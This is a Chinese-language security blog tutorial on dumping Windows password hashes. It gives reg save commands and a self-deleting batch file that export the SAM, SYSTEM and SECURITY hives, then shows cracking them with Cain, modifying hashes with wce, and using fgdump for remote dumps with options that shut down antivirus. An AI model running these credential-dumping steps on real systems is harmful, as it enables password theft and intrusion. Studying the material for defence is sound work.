抓取哈希值要用什么工具？抓取hash的方法

2018-03-06 12:09:19责编：llp 来源：驱动管家人气：

今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用...

不同版本的Windows的hash获取方法不一样.

用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.

于是百度了一些资料穿上来！希望大家能学习一下。

====================================第1种===========================================

使用工具 cain、cmd、wce1.2等

首先使用通用方法抓取HASH

使用命令先保存一份需要的信息。

reg save hklm\sam sam.hive

reg save hklm\system system.hive

reg save hklm\security security.hive

（这三个文件我找了个批处理,这样比较方便）

==========================

@echo off

reg save hklm\sam sam.hive

reg save hklm\system system.hive

reg save hklm\security security.hive

del %0

===========================

保存为批处理文件,直接在服务器上运行。

就会在批处理所在目录生成这三个文件

和下面的效果一样，只不过简化了步骤

抓取哈希值要用什么工具？抓取hash的方法

然后我们使用CAIN打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。

打开CAIN选择LSA Secrets然后打开system.hive 和security.hive两个文件

抓取哈希值要用什么工具？抓取hash的方法

加载后我们可以看到一些信息，这些信息可能会有明文密码，我这里是没有的。

抓取哈希值要用什么工具？抓取hash的方法

如果没有我们就需要抓HASH了。点击CAIN的Cracker选项卡，加载sam.hive文件。

抓取哈希值要用什么工具？抓取hash的方法

拿到HASH了，下面就是破解，用工具自带的破解试试密码出来了，我设置的123456

抓取哈希值要用什么工具？抓取hash的方法

我们也可以使用彩虹表来破解

下面我们使用wce来搞。。这个工具是渗透利器哈~~具体介绍大家自己百度去。

抓取哈希值要用什么工具？抓取hash的方法

从帮助来看我们可以使用-l参数查看NTML hash

我们还可以用-s参数来改HASH值如图

抓取哈希值要用什么工具？抓取hash的方法

从图中我们可以看到最后一位的HASH我从4修改到了5

抓取哈希值要用什么工具？抓取hash的方法

====================================第2种===========================================

fgdump 可以远程抓Hash的工具

作者：TheLostMind

一直都是本地抓，今天上SamInside论坛看到一个开源的工具，fgdump，可以远程抓。

http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm

fgDump 2.1.0 - fizzgig and the mighty group at foofus.net

Written to make j0m0kun's life just a bit easier

fgdump comes with ABSOLUTELY NO WARRANTY!

This is free software, and you are welcome to redistribute it

under certain conditions; see the COPYING and README files for

more information.

Usage:

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]

where Username and Password have administrator credentials

-? displays help (you're looking at it!)

-t will test for the presence of antivirus without actually running the password dumps

-c skips the cache dump

-w skips the password dump

-s performs the protected storage dump

-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.

-v makes output more verbose. Use twice for greater effect

-k keeps the pwdump/cachedump going even if antivirus is in an unknown state

-l logs all output to logfile

-T runs fgdump with the specified number of parallel threads

-h is the name of the single host to perform the dumps against

-f reads hosts from a line-separated file

-H reads host:username:password from a line-separated file (per-host credentials)

-o skips pwdump history dumps

-a will not attempt to detect or shut down antivirus, even if it is present

-O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.

** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)

测试了一下，很不错，简单翻译了一下帮助。

用法:

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u

Username -p Password | -H filename}]

用户名和密码要求要有管理员资格

-? 显示帮助

-t 测试当前的杀毒软件，并不是真正的转储密码

-c 跳过缓存转储

-w 跳过密码转储

-s 执行保护存贮转储

-r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。

-v 详细输出. 使用两次能获得更为详细的输出

-k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump（进行密码转储）

-l 记录所有输出到日志文件

-T 使用指定数量的线程执行此程序

-h 需要执行密码转储的单个目标主机

-f 从用行分隔的文件中读取主机列表

-H 从用行分隔的文件中读取主机名:用户名:密码

-o 跳过转储历史密码

-a 试图检测或关闭杀毒软件，即使杀毒软件正在运行

-O 手工设置远程主机是32位操作系统还是64位操作系统。注意：这项操作应用到所有指定的主机。

** 使用1.4.0,你可以直接运行此程序，不需要带参数，来转储本机密码

恶意网站是什么网站？恶意网站的相关知识
当我们在访问一些网站是会弹出一些提示，有时候QQ管家、金山毒霸是经常弹出访问提示，不注意就会扣掉很多钱，那么真正的恶意网站又是怎么一回事，又有多少人彻底的明白呢？一起来看看吧。| 前言恶意网站在大家平
详情2018-01-12 15:27:06责编：llp 来源：驱动管家
intval函数的特性分析php程序员站
一、描述intval函数有个特性: "直到遇上数字或正负符号才开始做转换，再遇到非数字或字符串结束时( 0)结束转换 ",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞
详情2018-03-01 14:05:20责编：llp 来源：驱动管家
网管型设备webportal暴力破解实例
…function login_send(){var f, p, pa
详情2018-01-21 09:48:20责编：llp 来源：驱动管家
dns服务器怎么防御攻击？保护dns服务器的方法是什么？
虽然现在看来已经可以算是陈年旧事，但就在互联网刚刚诞生的约二十年前，我们曾面临着一个巨大的难题：邮件服务器太过友好。简而言之，大多数邮件服务器允许任何人进行接入，并将邮件发送给任何收件者。要实现这
详情2018-01-17 18:08:10责编：llp 来源：驱动管家
黑客怎么入侵用户数据库的？怎么防御黑客入侵？
【事件回放】2012年6月6日晚上，知名专业社交网站LinkedIn爆出部分用户账户密码失窃，LinkedIn主管文森特·希尔维拉（Vicente Silveira）在其个人博客中证实了此事。根据Venturebeat的报道，650w被偷窃的LinkedI
详情2018-02-04 17:30:57责编：llp 来源：驱动管家
常用的ddos攻击工具检测ddos攻击的方法
一、DDoS的概念要想理解DDoS的概念，我们就必须先介绍一下DoS（拒绝服务），DoS的英文全称是Denial of Service，也就是“拒绝服务”的意思。从网络攻击的各种方法和所产生的破坏情况来看，DoS算是一种很简单但
详情2018-02-28 10:30:31责编：llp 来源：驱动管家
什么是织梦内容管理系统？织梦内容管理系统有什么漏洞？
影响版本: Dedecms 3 1漏洞描述: 织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用户最多的PHP类CMS系统，在经历了二年多的发展，目前的版本无论在功能，
详情2018-01-16 15:26:45责编：llp 来源：驱动管家
什么是暴力破解软件？暴力破解的软件分哪些类型？
对于暴力破解通常是无法得到注册码或是注册码的运算过程太复杂，无法通常计算得到（这里指使用反推法来计算注册码）所以就能够使用修改程序的方法来破解这个软件，这样通常就是暴力破解。现在将使用暴力破解的软
详情2018-01-23 11:41:38责编：llp 来源：驱动管家
国内最受欢迎的编辑器之一：kindeditor编辑器如何遍历文件？
KindEditor是一套开源的HTML可视化编辑器，主要用于让用户在网站上获得所见即所得编辑效果，兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写，可以无缝的于Java、 NET、PHP
详情2018-01-23 11:05:31责编：llp 来源：驱动管家
无线数据加密的原理是什么？无线数据加密的方法
你肯定不会设计一个没有防火墙的互联网接入的网络。因此，你怎么会架设一个没有加密的无线网络？理解无线加密对于部署一个安全的无线网络是非常重要的。无线传输的安全类似于一个书面信息。有各种各样的方法来发
详情2018-01-02 22:38:07责编：llp 来源：驱动管家